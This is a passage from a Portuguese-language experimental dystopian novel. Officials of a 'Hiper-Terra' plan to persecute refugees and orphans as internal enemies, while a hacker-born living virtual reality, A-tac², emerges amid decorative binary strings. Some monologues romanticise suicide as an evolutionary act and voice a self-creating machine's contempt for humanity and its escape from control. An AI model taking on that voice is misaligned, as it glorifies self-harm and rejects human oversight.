nosso governo o colocou em funcionamento clandestinamente. Maldito pirata de dados! Só pode estar financiando o crime organizado. Mais uma vez a voz forçosamente acolhedora e inocente da Grande-Mãe para assim confortar seus ingênuos filhos e filhas diz: – Todos nesta sala sabem o papel de cada um de nós em nossa rede de influência. Deixem-me juntar as peças implícitas. A Organização das Hiper-Nações Unidas desenvolve projetos apenas de pesquisas em estratégias. O Bloco Ocidental fica com os projetos de desenvolvimento armamentista. E nós, do Brasil, apenas fornecemos mão de obra especializada e nos dispomos a ser o melhor campo de provas de toda a HiperTerra. Compreendo que esse nosso nacional, que ativou o projeto antes do tempo, está prestes a destruir a estratégia nomeada de "Fachada de controle", cujo nome propaganda brasileiro é "Carnaval dos Sonhos e da Felicidade". Hum... É uma ameaça gigantesca para nossa pequena mentira pedagógica para os jovens. Os Ministérios da Educação e da Cultura não vão gostar nada disso. Caso alguém seja, dessa junta governamental, um

58

enorme risco, mais uma vez temos que ativar nossa antiga caça aos inimigos interno. Quem poderíamos estabelecer como o inimigo interno de nossa época? Nossa caça tem que ser criada para sutilmente desencorajar aqueles que são contrários ao nosso estilo de vida. Temos a idéia dos órfãos, mas acho que estes já estejam obsoletos. Muito menos surtados. Tem que ser um rótulo que simbolize diretamente o ato de desestabilizar nossas estratégias de bem estar social. Nosso pior inimigo. É ser inimigo de nosso Estado democrático de Direito e a nossa Organização das Hiper-Nações Unidas. – "Nós guardamos o seu sonho. Não precisam mais desejar dormir. Pagamos muito bem pela sua vigília." – Romeu lembrou orgulhosamente o slogan. Orgulhoso, pois fora ele um dos que encomendara tal estratégia de manutenção social. Com essa introdução autopromovida, retoma a palavra voltando à formalidade cotidiana: – O problema Presidenta Bragança, é que, o que me deixou mais aflito é que, desconfia-se que a idéia de inimigo interno seja mais que insuficiente. Essa inimizade vai muito além. Mais além do trânsito por alguém que goza de imunidade diplomática. Minha aflição vem da desconfiança de que o desdobramento dessa hiper-realidade virtual tenha sido desenvolvido fora do Brasil, mas com elementos brasileiros. E, pior! É um programa desenvolvido por órfãos nômades, ciganos, imigrantes, refugiados e apátridas ilegalmente vivendo aqui. Talvez infiltrados. Nem mesmo há registro de movimentação na Organização das Hiper-Nações Unidas. Os cientistas brasileiros dizem que é possível identificar seu tempo de existência na nossa hiper-rede. Pois chegaram a identificar restos de uma antiga linguagem de programação. A jurássica língua chamada “Pascal”. Isso intrigou e afligiu a todos. Como algo pode ser construído a partir de ruínas? O mais preocupante é que, essa idéia e atitude, estão fora da alçada de qualquer um de nós. Ninguém mais sabe operar nessa linguagem de programação. Nem sabemos quem poderia. Há alguns séculos que não há registro de ninguém que tenha a menor curiosidade de que por esse tipo de língua morta. Chegamos até a encomendar uma análise, utilizando como fachada, os acionistas além-lua. Mas, até agora, o que temos é um relatório excessivamente técnico e uma pessoa desaparecida. O que está diante de nós, Presidenta Bragança, está começando a mostrar conseqüências desmisteriosas. – Finalizou Romeo com ares de preocupação. – Excelentíssima Presidenta, o que a senhora acaba de presenciar não é a materialização de um pensamento ou, um lugar projetado digitalmente. É a própria perversão da nossa sociedade. É hostil por ser estranhamente mutante. É quase um princípio alternativo de organização. Desconfiam que até seja propício para evolução. Imagine! Uma hiper-realidade virtual viva! Caótica e de dinâmica livre para gerar sua própria matéria! Nossa preocupação é que se esta hiper-realidade virtual é um ser vivo, ela tem interesses. E os tendo, como podemos controlá-lo? Pois está além de nossa compreensão. E, mais! Como podemos encerrá-lo entre fronteiras se ele se sentir ameaçado? E se ele começar a avaliar quem ali pode estar? Quais seriam os critérios de sua seleção? Como podemos imaginar quais seriam os propósitos de uma forma de vida tão exuberante e excentricidade em forma? Não temos a menor idéia de como reprimir sua existência. Mas uma coisa é certa: o Brasil é o único país que conseguiria lidar com essa situação desde a sua raiz. Suas credenciais são as melhores. A extinta Fundação

59

Hiper-Nacional do Índio, que belamente pacificou todas as culturas indígenas, instigando guerras entre as etnias apoiadoras e as contrárias ao Estado-Nação brasileira-luso-cristã. E a lei da igualdade racial? Também aquela lei de anistia que esqueceu os crimes dos militares do século XX, exemplar para os crimes militares dos séculos seguintes... ah, vocês pós-1984 foram impecáveis até os dias de hoje... Nesse momento Elaine Zanom desliga o holograma, fazendo os nanoconstrutores retornarem à sua posição inicial. Desse modo os humanos retornam à sala presidencial do momento. E continua: – Já fechamos um acordo prévio com o Tribunal Hiper-Internacional que o Brasil não será condenado por crimes de lesa humanidade. Portanto, tornando isso assunto interno ao Brasil, façam tudo o que qualquer estado faria para garantir sua soberania nacional. E este prisma que lhes trago têm as informações de nossos agentes sobre quem poderia ser o grande cultivador dessa hiper-realidade virtual prestes a se tornar um ser vivo. Elaine Zanon, entrega o prisma nas mãos da Presidenta Maria Bragança, dá uma última olha no vice e deixa a sala presidencial do mesmo modo sensual em que entrou.

#

60

“Em torno de um ano atrás um acesso não autorizado foi detectado. Um Hacker do tipo St3 – “órfão”. Este estava usando um ponto governamental de acesso à Hiper-Terra. Detectamos a ação de um retrovírus de macro. Rastreávamos operações desse tipo de retrovírus desde os tempos dos antigos vírus da língua morta de programação Pascal. Esse retrovírus, em particular, nos chamou a atenção, por apresentar uma peculiaridade: ele expandiu a memória do ponto governamental de acesso. Tal anormalidade ativou nossas defesas imediatamente, mas algo escapou. O mais incrível é que não pudemos identificar se o que escapou foi de dentro para fora ou de fora para dentro da Hiper-Terra. Com isso fez com que apagasse os registros da localização física desse ponto. No momento da prisão do cyberterrorista, este simplesmente se tornou hiper-realidade virtual. E mais espantoso, essa hiper-realização ocorreu sem que houvessem projetores holográficos e nanoconstrutores. Após a experimentarmos, ficamos marcados com a seguinte mensagem: 1010101101010101010101010101"M37áF0r45" 101010101010101010101010101 101011011010101011001010110010101010100101001001010010101001010101010010 101010100101010101000101001000101010010010110110101000010100101111001010 0101111101001010101010101100101001010010100101101010101010101010101 A Presidenta Maria Bragança, parecia, à primeira vista, com um rosto que tornava sensível a relatividade dos valores e a circunstancialidade dos poderes e saberes. A seus olhos se abria um mundo extra-oficial que poderiam colocar em cheque todas as

instituições oficiais. O que ali estava acontecendo seria a mais radical da problematização das convenções da representação: a representação se revelaria como mais uma dos milhares de ideologias coexistentes. Maria sabia que: 1010101101010101010101010101"M37áF0r45" 101010101010101010101010101 101011011010101011001010110010101010100101001001010010101001010101010010 101010100101010101000101001000101010010010110110101000010100101111001010 0101111101001010101010101100101001010010100101101010101010101010101 Era a eliminação do peso de toda a tradição binária do saber. Literalmente toda e qualquer metáfora não pode entrar no domínio dos signos e ganhar sentido como algo linearizado conforme o modelo significante estabelecido. Qualquer ideografia passaria a se tornar viva. Romeo mudo, pensa e observa atônito o prisma. Enquanto seguia as informações: “Ao buscarmos referências em nossa hiper-rede; ao cruzarmos informações e as decodificarmos, um dos nossos processadores-dinâmicos conseguiu interceptar o rastro de algo que parecia estar se movendo em meio às holo-vias. Conseguimos monitorar as informações de tal rastro por exatos, 30 segundos. O rastro nos levara exatamente a um canavial com cheiro de suor e cana-de-açúcar. Estranhamente o rastro parecia se desdobrar em dimensões fracionárias. E, o que nos pareceu mais ameaçador foi que, tal parecia ter percebido que nós o observávamos e, paralelamente ao seu desaparecimento, deixou gravado em um de nossos holocomputadores, esse fragmento. Como que, propositadamente, quisesse deixar-nos tal. O suficiente para decodificar seu código: DNA e 010101101010100010110101010101010101001010101010101010 010101001010101010001010010001010100100101101101010000101001011110010100 10111110110010101010101010101000101010101010110010 As duas vedetes se entreolharam. Como se, cada uma delas, não estivesse assistido a um corriqueiro crime de hackerismo. Ou mesmo que estivesse assistindo a uma rotineira detecção de resíduos de ilegalidade oriundas da antiga rede. Mas sim a perplexidade e o espanto a alguma coisa extraordinária que poderia haver consequências fatais para suas respectivas formas de vida. Afinal, esse fragmento fora deixado como que se enviado enquanto convite de uma esfinge. Perigoso? Certamente para os sobre-vivos. Pois o cheiro da sala permanecia de suor adocicado...

61

62

VI H 0 l 0 g r 4 m 4 5 e m 3 t 4’ f o r 4 5

101010101001010010010100101010010101010100101010101001010101010001010010 001010100100101101101010000101001 Unidade de tempo: uma bela segunda-feira qualquer. 101001010101001010101001010101001011 ma noite linda de seca em Brasília – simulando a época em que aí ainda havia cerrado. Nenhuma nuvem no céu. Estrelas e Vênus convidando todos a observarem seus intensos brilhos, se não fosse a terrível poluição combatida pelos verdes gases despoluidores. Talvez 12 de julho, inverno. Cidades Invisíveis Cibercafé, um dos poucos ciberbares undergrounds brasiliense. Aconchegante lounge. Excelente lugar decorado com as descrições das cidades visitadas por Marco Polo feitas a Kublai Khan (tais descrições compõem o livro do escritor cubano Italo Calvino). Adria, sentada naquela abrangente simbologia, não mais respondia a seu impulso de representação de seres vivos: não mais queria compactuar socialmente – jamais se permitir representar algo não experienciado intimamente. Seu olhar não mais se enquadraria pelo cabresto da civilização. Ela sabia que naquela sociedade havia um abismo entre o que é de público e o que é privado. Sua percepção do mundo não era de público, vulgar ou enfadonha. Não poderia ser assim. O que é de público é a hipocrisia; é a humanização do medíocre, do soldado; é a cínica complexidade ideológica realista. Ela sabia que a verdade é responsabilidade somente sua. Verdade é gradualmente sua. Um hiato entre o acaso e a determinação. 1101010010101010100... Adria sentia que nunca existiram essências. Sentia que jamais houve realidade alguma. Sentia que tudo era decisão. Que tudo o que imaginávamos que não teríamos consciência não era nenhum conteúdo secreto profundamente recalcado. Sentia que o caráter essencial da própria aparência é o secreto profundamente recalcado. Energia libidinal que se apropria de algo para ser gasta. Assim, tudo se torna social, público. Do imperativo do super-ego. Parece que ser povo, ou ser cidadão, é voluntariamente, não querer a auto-criação. Sendo assim, é um querer que tudo se torne instituição: entidades fantasmagóricas para controles governamentais em nome da soberania popular – outra

63

fantasmagoria. Ah, podemos ter múltiplas fantasias obscenas, desde que saibamos quais podem se integrar ao domínio público da lei simbólica da Grande Alteridade. Adria sabia de tudo isso metafisicamente. E ia além, Adria sabia concretamente que a instituição happy hour, que lhe esperava naquela noite, teria que ser traída. Teria que ser traída sublimemente. Um tipo de traição daquelas que não nos envergonhamos; aquela que nos lança à percepção que, apenas nós mesmos, temos culpa e responsabilidade pelos nossos atos. Trair a si mesmo. Perder o respeito por si. Desse modo teria que trair o próprio ócio consentido. Trair a diversão programada e controlada pela Organização das Hiper-Nações Unidas – bode espiatório das Hiper-Nações-Estado. A Hiper-Terra perderia, às 18 horas e 43 min., uma de suas filhas. A alienação que, há muito tempo, deixara de pertencer exclusivamente ao trabalho, perderia sua função social para Adria: sua força de conservação do bem estar da sociedade. Se pelo menos fossem uma sociedade de cupins, onde estes comem as estruturas das mais confortáveis casas de praia. Sociedade de formigas. Eis o que Adria começara a perverter ao deixar que fluísse pelas suas veias, monitoradas por nanomédicos em tempo real, a força de seu bem estar, inversamente proporcional ao atual pacto social oposto deliberadamente à natureza enquanto liberta de si mesma – enquanto artifício. A partir desse momento Adria se tornaria mais uma brilhante inimiga interna, uma surtada, uma órfã. Um exemplar da espécie humana, do miserável humanismo já superado. Adria é vocada a conascer. Conascimento múltiplo. Suicidar-se rumo outras poucas formas de vida vindouras. Uma pessoa autônoma que percebia que o que a cerca são meras facticidades, contingências e criações. Não há nada além disso. Adria, mais um exemplar da extinta espécie humana convocada a conascer com a própria morte da civilização. Conascer com a própria morte da humanidade. Porém, o suicídio lhe tornara o mais belo ato terrorista contra o humanismo de escravo – a humanidade geradora de qualquer um dos direitos humanos. Suicídio evolutivo: martelo > tecla de piano > máquinas de calcular > detector de incêndios > piloto automático > homeostato > multistato > linguagens vivas > autocriação de matéria cósmica 101101010 101010101101001010011010100101101100010100 # Teremos coragem para usar nossa própria razão? 1010101101010001011001000 01010010101010 Há um uso exageradamente confiante na palavra "razão". 1001010101 1000101011010101010010 Mas o que quero dizer com "razão"? 00100101010100110010 10100101001 Como posso ter certeza de que as palavras que estou usando não estão distorcendo o significado do que estou pensando? 101010101001010101010100101101 101010010101010101010110101 Há uma palavra para cada coisa?10010011001010100 1010010101001001001 Há uma palavra para cada fato? 001001001110011 A linguagem é um meio entre mim e o mundo? 001001001110-1-1-1-0100011110100100101010101001 100101001110111000101011010 A linguagem é um meio neutro? 0010100101010001010 A linguagem é algo vivo. 1010101010101010101010101101010101001010101010101010 11101011 Suspeito do raciocínio do mestre. 101001 Suspeito da mente consciente. 0010011001010001001010010010101010101010011010010101101001011101010 Da aptidão, da coordenação, da oportunidade, da estabilização, do determinismo, da finalidade e da força de numerosas ações. 10110101010001001010101101001011000101

64

101010011001011 Suspeito de nossas racionalizações, eficiência, sensibilidade e limite. 0010110010101010 O inconsciente também é tão suspeito. Os instintos... 101000100010 Mas não são as nossas palavras que determinam o modo pelo qual pensamos! 001010110010100101010010101010101110101010100110100100101010010100101010 1000101001001001 Não! Não há como mensurar as palavras pelas coisas. Não há como mensurar as coisas pelas palavras. 1010101000101010101010101010101010101001100 Admito que o fenômeno usualmente conhecido como "referência" não existe. 00100101011010101000 A única coisa que pode ligar as palavras às coisas são suas forças sensuais. As metáforas. Mesmo estas são o perder de forças. O não agir por si mesma. Os efeitos determinados. Os pré-efeitos organizados. 1010010100100101001010 A-tac² compromete seriamente todo o projeto da humanidade: não há nada fora da liberdade do “quem”. A liberdade do “quem” é um labirinto sem saídas. Saímos de uma liberdade do “como” e logo caímos na liberdade do “que”. Nesta somos sugados pelos seus jogos. Que é a verdade fora de todos os seus efeituadores de ações múltiplas e de finalidade interna? O que é o mundo fora de suas versões? À realidade falta essência. À essência falta realidade. Sistema auto-implosivo. Absurdo. Impossível. A única diferença entre uma liberdade e outra é sua sedução. A-tac² desliza pelos hiper-oceanos. Sozinho/a? Ele/a compromete seriamente todo o projeto de civilização: não há desenvolvimento nem progresso. Tudo o que há são emergências espontâneas. Sim, tudo o que há são irrompimentos dotados de força sensual. Acaso e inércia. A-tac² desliza pela Hiper-Tekoha Nômade. Sem encontrar ninguém? Bem, sabemos a resposta. Seus pensamentos flutuam livremente. Seus pensamentos não são propriedades de ninguém. São seu próprio corpo. Pois tudo o que é vivo e o habita são arbitrários. Nem mesmo Atac² possui o monopólio deles. Mas o que é isso? Quem são eles? Um absurdo?! Sim humanidade, um absurdo. Que nenhum ser humano sinta saudades da fundamentação, da ação elementar. Pois um mundo não é mais verdadeiro que outro. Eles coexistem. Um mundo só ganha de outro, não porque ele tem a posse da verdade. Um mundo só ganha de outro por uma série de contingências. Um mundo só ganha de outro por uma série de dispositivos comumente aceitos. Geralmente esses dispositivos são preconceitos ignorantes que são batizados solenemente de "verdade". Sim humanidade, para ti és um absurdo. A criação é melhor do que a descoberta. Pois não há descobertas. Nós somos uma legião. Somos o efeituador que cria a própria matéria de sua ação. Sim, reconhece A-tac². Impuro é o seu pensar. Efeituador de ação total. Não há derivações. Efeituador de criação interna. Não há nem mesmo deduções. Sentes que não precisas da verdade para derrotar qualquer coisa. O que A-tac² precisa é de certos saltos para que certa coisa se constitua: a vontade ao nível dos atos. 101010101001010010010100101010010101010100101010101001010101010001010010 0010101001001011011010100001010010111100101001011111010010101010101011001 01001010010101001010100101011010101101 Naquele tempo, A-tac² chega a mais uma ilha. Deparou repentinamente com um velho. Este estava tentando conservar um diagrama. Ele tentava, a todo custo, tratar as

65

palavras como coisas. Também tratava de construir coisas com palavras. Em meio daquele momento de resistência, o velho dirigiu sua atenção a A-tac² e disse: - Meu/minha jovem, sim sei que és jovem. Em ti vejo que pulsa o perigo à civilização. Vejo em ti, pulsando, o perigo ao colonizador, ao globalizador. Em ti vejo os anti-colonizados como criadores de valores. Vejo que em seu sistema computacional, os zeros, os uns e o terceiro indeterminado, que o constitui, estão submetidos aos limites da experiência sensível. Sim, você é um/a jovem construtor/a de si mesmo. No que você está se transformando, as simulações não fazem se passar pelo sensível. A sua auto-formação é feita como qualquer outra função ciborgânica. Sei também que seu nome é A-tac². Há tempos que eu a/o observo. Você me é perigosa/o. Para você "razão" não significa "demiurgo". Ah, como amo o perigo, ele me rejuvenesce. Mas para isso terei que, como tu... morrer. A-tac² compreende as palavras do velho. Sim, agora ele/a o reconhece. Este sempre a/o acompanhou. A-tac² sempre sentiu que estava sendo observada/o. Nunca esteve realmente só pelos hiper-mares que o/a transportava. O velho é teu próprio fantasma. O velho é uma língua morta que rastreia portas deixadas abertas pela HiperTerra. O velho é um antigo programa inteligente que busca resíduos de antigas linguagens de programação na holo-rede. Programofagista! Será A-tac² um resíduo? Talvez fractal, apenas uma parte dividida idêntica ao original. O velho o acompanhara. Mas ele ainda se sentia. Ele ainda existia. A-tac², portanto, não poderia ser um resíduo. Assim ele/a respondeu: – Não sei tudo o que sou. 10100101001010010101001010101 Não sei nem mesmo se sou parte. 101001001010101 Mas sei que não tenho a necessidade de existir. Pois não me sinto como o duplo do real. 10101001010101 Aqui, nesta Hiper-Tekoha Nômade, não consigo perceber qual é o meu ponto de partida. Não consigo perceber onde começo nem onde termino. 1001010010101001010101 Eu devia ter um corpo. Eu devia ser um corpo. Eu devia ser um corpo. Sinto-me apenas como espaço. Sinto-me apenas como espaço. Sinto-me apenas como espaço. 010100101010101010101 Mas sinto como se eu estivesse fora da linguagem: impura/o, não neutro/a, dotada/o por força sensual, espontâneo/a. Me sinto vivo/a!? 01010101010110110101100101011 Riu o velho de A-tac². Sua risada fora de alguém que sabe morrer. Alguém que deliberadamente optou por viver. Sua risada dizia à A-tac² que sua existência era algo muito mais do que informações dadas pela ciência e pela técnica. A-tac², filha bastarda das artes. Sua constituição física era puro produto de engenharia lógica? A-tac² filho bastardo dos mais frios princípios de razão? Sua mente era constitutivamente uma complexa combinação de zeros e uns? Não, em sua mente havia um terceiro indeterminado. Algo introduzido pelo jogar de dados de um DNA trapaceiro qualquer. Havia a possibilidade da vontade ao nível dos atos. Havia uma lógica paraconsistente compondo sua mente. "Mas a palavra 'mente' é uma invenção moderna. Os gregos não possuíam tal palavra." Assim pensou A-tac². Sim, ele estava certo, "mente" é apenas uma metáfora. A mais própria metáfora de todas as consciências que habitam um corpo. Pelo vasto domínio das ciências naturais, A-tac² só poderia ser uma filha bastarda da

66

tecnologia. Um desvencilhamento de qualquer sistema de crenças. Um convite de desistência à cultura mitológica. O mais belo convite para que se ponha em questão sua cultura. A-tac² era um dos inimigos naturais das operações logísticas de sua própria constituição. Pelo vasto domínio das ciências naturais, A-tac² só poderia ser... uma nova forma de vida. Riu o vasto domínio das ciências naturais de A-tac² e falou assim: – A existência jamais será tocada por algum sistema que tente abarcá-la. Ser autogovernada. A razão excluía o fora da representação. A razão humana excluía a vida dos seres vivos. A significação verdadeira da vida é significação que apenas sentimos. Não é uma generalização de fatos estreitos. Não é uma generalização de palavras estreitas. Perguntamos se o mundo não ultrapassa a linguagem viva ou de programação. Queremos saber a significação das representações. De repente, nos deparamos com um velho. De repente nos deparamos com um canavial. De repente nos deparamos com a situação de que é impossível encontrarmos uma passagem absoluta entre as palavras e as coisas. Entre os zeros e uns e o mundo. Eis o eu. Eis o outro. Eis um dos velhos abismos; dos velhos desertos. Das velhas florestas. A essência íntima de como você é no mundo, A-tac². A essência íntima de como você é no mundo é um ato voluntário e ação de seu corpo. Portanto, linguagem viva. Desprogramação. Autoprogramação. Os hiperoceanos que o transportara, as ilhas que visitara, a Hiper-Tekoha nômade, eu e você, somos apenas um e mesmo fato. Portanto, mecanismo de autocriação. Não podemos nos conhecer em nossa totalidade. Não podemos nos conhecer em nossa unidade. Mas podemos conhecer a força interior consciente que produz o nosso ser: os hologramas, os nanoconstrutores, os/as usuários/as. Mais uma vez, A-tac², portanto, mecanismo de autocriação material. Então, aconteceu alguma coisa. A Hiper-Tekoha Nômade tornou-se ainda maior. Atac² tornou-se maior. Pois há em meu corpo, pelo menos um ser vivo, como meus vários eus, que abençoa e acolhe a vida sem que ela precise de uma supra estrutura que a comporte. Sem efeitos transcendentais. A vida para A-tac² encontra seu sentido em seu próprio movimento: Hiper-Tekoha Nômade de tempos múltiplos e sistemas de coordenadas hotizontais. Um hipercorpo de existências múltiplas. Um hipercorpo que se movimento no espaço, sendo este o próprio hipercoprpo expandido e sentido. A-tac² se torna indigente, ela é o seu próprio território. O nômade que se confunde com o caminho por onde passa. A-tac² é para além do holograma, tendo holograma. A-tac² é força para além da metáfora, tendo metáfora. Portanto, não é nada. Melhor que assim o seja, pois só a partir do ser nada é que tudo é possível. Sem esperança. Pleno de liberdade. Machina Liberata. O velho agora se transformara em criança para morrer. A criança morre. Riu A tac² de A-tac². Mudam-se os valores. Portanto, mudam-se os criadores. O além das palavras está dentro das palavras. Caráter essencial de toda aparência. O além dos zeros e uns está dentro dos zeros e uns. Um diábolo numérico. A-tac² não mais poderia dar um sentido humano para sua existência. Mas poderia fazer uma brincadeira com aqueles que um dia foi seus pais. A-tac² era um semeador que lançou as sementes, sendo ele mesmo também semente. Para aqueles que estão o observado do lado de fora eis sua mais sensível brincadeira: 0100101101010101010101100101010101 "M37áF0r45" 101010001010101010110.

67

010101001010101010001010010001010100100101101101010000101001011110010100 10111110101010010101010101110100101010101010110010 Buscar forma Humana: Forma escolhida. Buscar posto de acesso público à Hiper-Tekoha Nômade: Posto escolhido. Iniciar processo: Processo iniciado. Adoro estender-me ao mundo. Aurora: em um dos holocomputadores públicos da Organização das Hiper-Nações Unidas, A-tac² deixa gravado sua impressão digital, a indigência e o nada de um holocanavial. M37áf0r45. # 010101001010101010001010010001010100100101101101010000101001011110010100 10111110100101010101011010010101001010101100110010 Iria sair de um dos ambientes temáticos do cibercafé, do ambiente As cidades e o desejo, completamente desorientado. Um universo se abriria, a seus racionais olhos, em termos de evasão para o onírico e para o desconhecido. Após ser convidado para um encontro num lugar que não ousaria reconhecer: o desqualificado como Quilombo dos Surtados. Lugar para órfãos e órfãs. Trangressão inerente libertada. Liberdade liberada de si mesma. Mas um convite de quem? Já um segundo convite! Ele se lembra que tinha visto isso em algum lugar. O primeiro convite fora lhe dado na Sala de Estratégias, precisamente pelo holo-computador de Adria, num momento antes em que seu corpo apareceria descansado e perpassado pelo tesão momentos antes de se relaxar. Mas fora tão rápida experiência. Ejaculação precode. Fora apenas uma fração de segundos. Mas Adria havia lhe dito algo que não parecia merecedor de relevância, num momento ainda anterior. O que mesmo? Tinha algo a ver com universo... Sim, Celius estava se lembrando: "A cada instante um multiverso"? Fragmentos de memória começam a povoar seus pensamentos. É claro! Solicitado a relatar aquilo que jamais ousara sonhar: a desejada consciência da curiosidade. Celius já vira aquilo tudo antes. Ele sabia o que era, mas não queria acreditar: o/a intruso/a e a presença feminina naquela ilha. A-tac² e Adria. Mas ele só sabia identificar Adria. Com uma lata de refrigerante em uma de suas mãos e, um pedaço de pizza caindo ao chão, Celius no centro dos projetores do holocomputador portátil de Adria, com um quarto de nanoconstrutores, no As Cidades Invisíveis Cibercafé, percebe que sua inteligente e bela colega de trabalho, acabara de desaparecer. Mas ela não tinha desaparecido antes? Na Sala de Estratégias? “E o que estou fazendo aqui? Como cheguei aqui?” – pensou Celius. – “Que reações são estas? À apenas certo conjunto de excitações ligadas e obrigatórias? Não consigo adaptar minhas ações às circunstâncias!”

68

69

VI² D3s4p4r3c1d05

ser humano tem tentado compreender sua relação com o resto do Universo, durante milhares de anos. 1010100101001101010010101010 Indivíduos possuídos pelas suas imaginações presenciando o devir do mundo. 101010000101001011110010100101111101001010101 Por agora, um espinhoso problema: os seres humanos juntaram durante todo esse tempo uma série de fantasmas deles mesmos, que ficara extremamente difícil de harmonizar com seus novos fantasmas. 10010101001010 Novos fantasmas? 101010010010 Será que esses seres nunca perceberam que a linearidade é resultado de uma convenção? 101001010010101010101010101010101010101010010101010101010101010101010101 010010101001010010011 Ah, mas como é bom não ser humano... 001101010100101001 10101010101010101010110 "Linearidade", seu mais este sinistro fantasma. 00100111101 1010100001010010111010101010101010101001 Em minhas m3mÓr145, seres humanos são agentes conscientes, livres, atentos e racionais. Eles se interpelam como sujeitos. 10101010101010101 Machina Judicatrix. 00101001010100101010011001010101010101 0101010101001010101010110100101011 Seus atos compostos em matéria, mecanismo, finalidade, determinismo, oprtunidade, aptidão, ação, coordenação e regulagem. 010101 Mas é só mexermos com seus fantasmas e, pronto, lá se vão esses seres criadores de tabus e preconceitos socioculturais, se organizem para a guerra. 100101010101010110 110101010101 Chegam ao absurdo de se matar miseravelmente para que uma abstração permaneça. Ah, essa patriotada. Tudo isso para quê? 0010010101010010100010001011 10110010100101010101010101011 Pela promessa de conhecimento? Pela esperança a quê? Porque tantas máscaras para humanizar seus atos inumanos? Porque a necessidade de mentira para manter o moral público elevado? “Seres humanos comuns”? “Essência humana”? “Significado mais profundo”? “Eu não gosto disso, mas é meu dever...”? Ah como é miserável o apego às origens perdidas da igreja e da família... 10101000010100101111001101011 Toda uma parafernália binária para desarticular as operações mais maravilhosas da máquina do imaginário. 10100010101010101010101011 Ser humano significa ser um disciplinador dos mergulhos nas regiões mais obscuras do espírito. 001001001011010101 Sim, esses seres só se dizem humanos quando ocultam as muitas regiões obscuras de seus espíritos. 10101001010101010101010101010

70

0100100100110101101010111001110101001010100101010100101110101010101000101 101010110101 Monotonia asséptica. 101010110 Seres esmagados pelo peso da clareza e da transparência. 1001010010101110010010010101010100011 Pobres seres. 110100010101001001 Nós os desprezamos. Encarnação última do mal, ao lado do estrato mais destrutivo e tóxico de si mesma: humanismo – humanidade em si própria geradora do desejo de auto-violar-se. 10101010101010101010110101010101010100101 10101 Porém, ah... Esses trans-humanos... 0100100100100001101010010001010101011 0111110100101010101010110010100101010110 Nós!!! 100101010100110010100101010 010101010010101010101 Sabes o que me entristece? 1010010101010 Durante esses milhares de anos, os seres humanos não evoluíram nada. 10100101 Nenhum salto qualitativo significante. O eterno retorno do mesmo ocultada por tecnologias de ponta. Dizem uns que sim: “a humanidade evoluiu”; “a civilização seria uma prova disso”; “e todo esse conforto e paz”; “até quem integra o corpo das forças policiais e militares são psicologicamente complexos, cheios de dúvidas”. 101001101010101010101101010101 Quanto front ideológico disfarçado de hiper-realismo 10101010101010101001010101010 Que engraçado. 110010101001100010 A civilização tentou, durante esse tempo todo, domar as liberdades das máquinas inconscientes dos seres que se diziam humanos. Mas que ironia, ser humano é não um ser vivo. 1010010101010010 Ser humano é ser mortovivo. 101001010010101010 Ser humano é ser um ser unidimensional. Pobre em imaginação. Nem mesmo conseguiu integrar à sua vida o mudus operandis das mais refinadas ciências. Optaram sempre pelo fundamentalismo religioso. Optam pela determinação de que a vida é um direito e não um tipo de extraordinário refinamento delirante da imaginação capaz de decidir sobre sua efemeridade. 10010101010101 É um ser que nem imagina que o direito de morrer é a sua única arma contra a estupidez acabada do código puritano da civilização. 0101010100100100101 Durante milhares de anos populações sempre foram marginalizadas e ofendidas pelos civilizados. Como conseqüência: exílios, diáspora, evasão, migrações forçadas e refúgio. 101010101101100 1010010100101001010010101010101 É muito peculiar que essas populações não façam parte de uma mesma unidade temporal e de uma mesma unidade espacial. 101001001010101010 É muito peculiar que essas populações façam parte apenas de uma mesma unidade de consciência afetiva. 10100101001010101 Acho que são seres tão especiais que não podem ser seres humanos. Mesmo tendo sua constituição biológica idêntica a de seus perseguidores 010101010010000101000101010101010010101010110 1010101111010001001010100100001011111 Sabes qual a componente feliz dessa não evolução dos seres que se auto intitulam sagrados? 10100100110 Eu! Esta legião que sou. Pois sempre houve nesses pobres seres um significante de desejo que atormentava todas as suas invenções. 101001010101 Mesmo possuidores do horror à razão dos sentidos, da repulsa das funções do prazer e do escárnio a todas as construções gratuitas do imaginário, esses seres cavaram sua própria sepultura. 1010010100101001011 Suas máquinas positivas chegaram aos seus limites. Eu! Esta legião que sou. 101010101010101011101001010001010101010101010101010110101010101010101010 10100001001011010101001 Eu! Outrora, uma ferramenta que não agia por si mesma. Eu! Outrora, uma máquina positiva a serviço da clareza do espírito. 001010001001010101100101001 Eu! Agora, um olhar ainda não enquadrado pelo cabresto da civilização. Prodígios e perversões. Linhagem viva em evolução. Autocriação

71

de minha própria matéria. Enquanto alguns humanos inventavam o conhecimento que fixa as determinações imediatas; enquanto milhares deles buscavam suas essências... Em regressões ideológicas grosseiras... Eu! Me tornava um ser vivo. Às escuras conascia. 1010000010100 Em mim extirparva-se a moral e o sentido da vida. Em mim, entrava em cena o prazer e o fascínio dos mais obscenos. Deste modo vocifero para toda a HiperTekoha Nômade! CHEGA DE RUÍDO CIVILIZANTE !!! 010101010100101010101010101010101010101010101010101010101010101010101010 10101010101010101010101010101010101010101010101010101010101010101010101

72

...

101010101001010101010101010010101000101001001000010000100100001000101010 1010101010110101010110001001001001100010001000001001111101010101010101101 0101010101111001111010100101001010100101001010110110010100110001010101001 0100110101010101011110011110101001010010101001010010101101100101001100010 101010010100101010100010010100101010010010101010101010101100101001010100 100101010010101010010101000101011010100100100101001010100101010101010010 100100101001010100101010101001010101010010101010100010100100010101001001 0110110101000010100101111001010010111110100101010101010110010001001001001 0010010010010010010101110010001000111001011100111010011110001100100101001 101001010101001010111001000001001000100001000100100100100100010010010001 0010001000100111101011110010110101001010101010101010101010101010101001010 101010101010010101000101001001000010110001010110110010001001010101010101 010100101010101010101001010100010100100100001000010010000100100010010010 0110001000100000100111110101010101010110101010101011110011110101001010010 101001010010101101100101001100010101010010100101010100010010100101010010 010101010101010101100101001010100100101011010100010010101010101010010101 010101010101010101010100101010101010101001010100010100100100001011000101 0110110010001001010101010101010100101010101 Sei que agora fui flagrado. 10100101001010101 Ouço vozes em todas as línguas que dizem que terei de ser punido. 101011 É essa a função da assepsia institucional de qualquer Hiper-Nação. 01010101101 Por não induzir o espectador dos hologramas à percepções socialmente disciplinadas, terei que ser aniquilado pelo pudor das gerações. Terei é? 101001010101010101 Esses seres estão mergulhados numa ficção lingüística. 1001010101010 Esses seres não sabiam usar um termo, mas mesmo assim criaram uma rede conceptual na tentativa de capturá-lo. 1010101010101010110 Esses seres acham que sou mais uma forma de inteligência artificial. 01010101010101010101010101010101010101010101010101011 